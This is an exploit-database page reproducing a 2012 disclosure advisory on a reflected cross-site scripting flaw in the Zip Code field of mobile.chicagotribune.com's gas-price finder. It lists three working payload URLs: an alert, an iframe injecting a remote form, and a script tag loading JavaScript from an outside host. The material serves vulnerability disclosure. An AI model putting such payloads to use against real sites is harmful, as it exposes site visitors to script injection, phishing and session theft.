Chicago Tribune Cross Site Scripting



EKU-ID: 1481 CVE: OSVDB-ID:
Author: Janne Ahlberg Published: 2012-02-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Title: Chicago Tribune reflected Cross Site Scripting vulnerability
Vendor: Chicago Tribune (http://www.chicagotribune.com/)
Description: mobile.chicagotribune.com suffers from a reflected Cross-site Scripting (XSS) vulnerability.

Advisory time-line:
----------------------------------------------------------------------------------------------------
- Vendor notified: 13-Sep-2011, no response.
- CERT-US notified: 19-Sep-2011, no response.
- Packet Storm advisory: 14-Feb-2012

Test environment
----------------------------------------------------------------------------------------------------
- Latest Firefox browser
- Various mobile browsers


Details:
----------------------------------------------------------------------------------------------------
Affected functionality: Gas Prices finder, script: /s.p, method GET. Input field: Zip Code 

Test #1, simple alert
http://mobile.chicagotribune.com/s.p?sId=54&m=b&zipCode=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E+

Test #2, injecting a remote form using IFRAME
http://mobile.chicagotribune.com/s.p?p=hl9qEY7IiS1s&m=b&zipCode=%3Ciframe+src%3Dhttp%3A%2F%2Fidash.net%2Faskeng.html+height%3Dp=hl9qEY7IiS1s&sId=54&

Test 3, executing remote Javascript
http://mobile.chicagotribune.com/s.p?sId=54&m=b&&m=b&zipCode=%3CSCRIPT%20SRC=http://idash.net/xs.js%3E%3C/SCRIPT%3E

Note: the scripts and HTML-forms are not malicious.

Researcher
----------------------------------------------------------------------------------------------------
Janne Ahlberg 
Project site with contact details: http://idash.net